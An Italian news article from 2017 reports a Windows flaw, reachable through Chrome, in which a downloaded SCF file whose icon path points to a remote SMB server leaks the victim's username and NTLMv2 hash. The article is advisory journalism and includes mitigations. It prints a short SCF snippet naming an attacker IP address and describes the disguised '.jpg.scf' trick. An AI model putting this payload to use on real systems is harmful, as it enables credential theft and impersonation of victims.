Come rubare le credenziali di Windows usando Chrome

Una falla consente agli hacker di sottrarre nome utente e password sfruttando il browser di Google.



[ZEUS News - www.zeusnews.it - 18-05-2017]

windows password chrome

Windows e Google Chrome sono un'accoppiata piuttosto popolare ma, stando a quanto ha rivelato Bosko Stankovic, anche pericolosa.

Stankovic, che si occupa di sicurezza per DefenseCode, ha scoperto che è possibile usare Chrome per rubare la password di Windows grazie a una falla nel sistema operativo.

Tutto ciò che un malintenzionato deve fare è convincere la propria vittima a visitare un sito che contenga un file SCF (Windows Explorer Shell Command File), un formato che risale ai tempi di Windows 98.

In sostanza, un file SCF è un file di testo con una sessione che indica il comando da eseguire e l'indicazione dell'icona da adottare, completa del percorso per recuperarla. Il contenuto è generalmente di questo tipo:

[Shell]
Command=2
IconFile=explorer.exe,3
[Taskbar]
Command=ToggleDesktop

Il problema è l'icona: generalmente l'indicazione della posizione si riferisce a un file locale, ma si può indicare anche un server SMB remoto col quale Windows tenterà automaticamente l'autenticazione non appena l'utente tenterà di visualizzare il file scaricato, anche semplicemente aprendo la cartella con Windows Explorer.

Il malintenzionato ha bisogno soltanto che nel file SCF scaricato dalla vittima ci sia un contenuto simile al seguente:

[Shell]
IconFile=\\170.170.170.170\icon

Ovviamente, l'indirizzo remoto indicato deve essere quello del server SMB predisposto in ascolto.

Durante il tentativo automatico di autenticazione da parte del PC delle vittima, l'autore del file SCF può carpire il nome utente e l'hash NTLMv2 della password, per poi tentare di craccarlo in seguito oppure «per usarlo per accedere a servizi online che adoperino lo stesso tipo di autenticazione (per esempio Microsoft Exchange)» per impersonare la vittima senza nemmeno conoscere la password.

Tale tecnica d'attacco non è veramente nuova: è stata usata a suo tempo dal famigerato Stuxnet, che però per diffondersi adoperava i file LNK.

Proprio a causa di Stuxnet, Chrome è stato attrezzato per proteggere gli utenti dai file LNK, ma non dagli SCF. Inoltre, da allora Microsoft ha imposto ai file LNK di cercare l'icona soltanto nelle risorse locali.

Sondaggio
Vuoi scaricare la canzone 'Yesterday' dei Beatles; esistono varie opzioni su Internet. Quale file scarichi tra i seguenti?
Yesterday-Beatles-Song.scr
Beatles_All_songs.zip
Beatles_Yesterday.mp3.exe
Betles-Yesturday.wma

Mostra i risultati (1608 voti)
Leggi i commenti (10)

«Impostare la posizione dell'icona a un server SMB remoto» - spiega Stankovic - «è un noto vettore d'attacco che sfrutta il sistema di autenticazione automatica di Windows quando si cerca di accedere a servizi come la condivisione di file remota».

C'è un ulteriore dettaglio da considerare: il ricercatore ricorda che in Windows Explorer i file SCF appaiono sempre senza l'indicazione dell'estensione, indipendentemente dalle impostazioni.

Ciò significa che «un file chiamato immagine.jpg.scf apparirà in Windows Explorer come immagine.jpg» e verrà quindi scambiato per un'innocua fotografia.

Allo stato attuale, tutte le versioni di Windows, compreso Windows 10, sono vulnerabili.

Per difendersi dall'attacco gli utenti possono disabilitare le connessioni SMB in uscita (porte TCP 139 e 445) dalla rete locale, agendo sulle impostazioni del firewall.

Secondo Stankovic, inoltre, è una buona idea disabilitare il download automatico in Google Chrome: in tal modo qualsiasi tentativo di download dovrà essere approvato dall'utente, che potrà rendersi conto di ogni comportamento sospetto.

Google, intanto, ha fatto sapere di stare lavorando su una patch.

Se questo articolo ti è piaciuto e vuoi rimanere sempre informato con Zeus News ti consigliamo di iscriverti alla Newsletter gratuita. Inoltre puoi consigliare l'articolo utilizzando uno dei pulsanti qui sotto, inserire un commento (anche anonimo) o segnalare un refuso.
© RIPRODUZIONE RISERVATA

Commenti all'articolo (2)

Certo che limitarsi a correggere un bug solo per i file con una certa estensione senza preoccuparsi di quelli che, pur avendo lo stesso tipo di criticità, hanno un'estensione diversa mi sembra alquanto superficiale... :roll: Leggi tutto
3-6-2017 16:09

Più che "finestra", dovevano chiamarlo "Zanzariera" questo OS.
21-5-2017 07:29

La liberta' di parola e' un diritto inviolabile, ma nei forum di Zeus News vige un regolamento che impone delle restrizioni e che l'utente e' tenuto a rispettare. I moderatori si riservano il diritto di cancellare o modificare i commenti inseriti dagli utenti, senza dover fornire giustificazione alcuna. Gli utenti non registrati al forum inoltre sono sottoposti a moderazione preventiva. La responsabilita' dei commenti ricade esclusivamente sui rispettivi autori. I principali consigli: rimani sempre in argomento; evita commenti offensivi, volgari, violenti o che inneggiano all'illegalita'; non inserire dati personali, link inutili o spam in generale.
E' VIETATA la riproduzione dei testi e delle immagini senza l'espressa autorizzazione scritta di Zeus News. Tutti i marchi e i marchi registrati citati sono di proprietà delle rispettive società. Informativa sulla privacy. I tuoi suggerimenti sono di vitale importanza per Zeus News. Contatta la redazione e contribuisci anche tu a migliorare il sito: pubblicheremo sui forum le lettere piu' interessanti.
Sondaggio
Secondo te, come nascono la maggior parte delle bufale che girano su Internet?
Come scherzi rivolti esclusivamente ad amici e conoscenti (che poi involontariamente li propagano in giro)
Dalla "buona volontà" di persone che credono di fare un favore al mondo diffondendo dicerie e stranezze dandole automaticamente per buone
Dalla curiosità di vedere se una propria invenzione possa diventare "famosa" sulla rete, ma anche quanta gente ci arriverà a credere e con che velocità si propagherà
Dalla volontà di creare disinformazione su determinati argomenti
Altro (specificare)

Mostra i risultati (2408 voti)
Novembre 2024
La vecchietta digitale che fa perdere tempo ai truffatori telefonici
La punteggiatura è morta: l'ha uccisa l'iPhone
Elon Musk e l'attacco ai giudici italiani
D-Link, falla in migliaia di NAS non sarà mai corretta
L'app per aggiornare a Windows 11 anche i PC non supportati
Lo script per aggirare i requisiti hardware di Windows 11
Windows, ora si può accede allo smartphone senza il cavo USB
Ottobre 2024
San Francisco, 200 milioni per liberare la metropolitana dai floppy disk
WhatsApp semplifica i contatti e si prepara a supportare i nomi utente
Windows 11 24H2, bug a non finire
Windows 11 24H2 occupa un sacco di spazio su disco
Bucato l'Internet Archive, sottratti i dati di 31 milioni di utenti
Google rimuove Kaspersky dal Play Store
Ecco Office 2024, con un nuovo aspetto e senza abbonamento
Windows 11, l'update causa la schermata verde della morte
Tutti gli Arretrati
Accadde oggi - 23 novembre


web metrics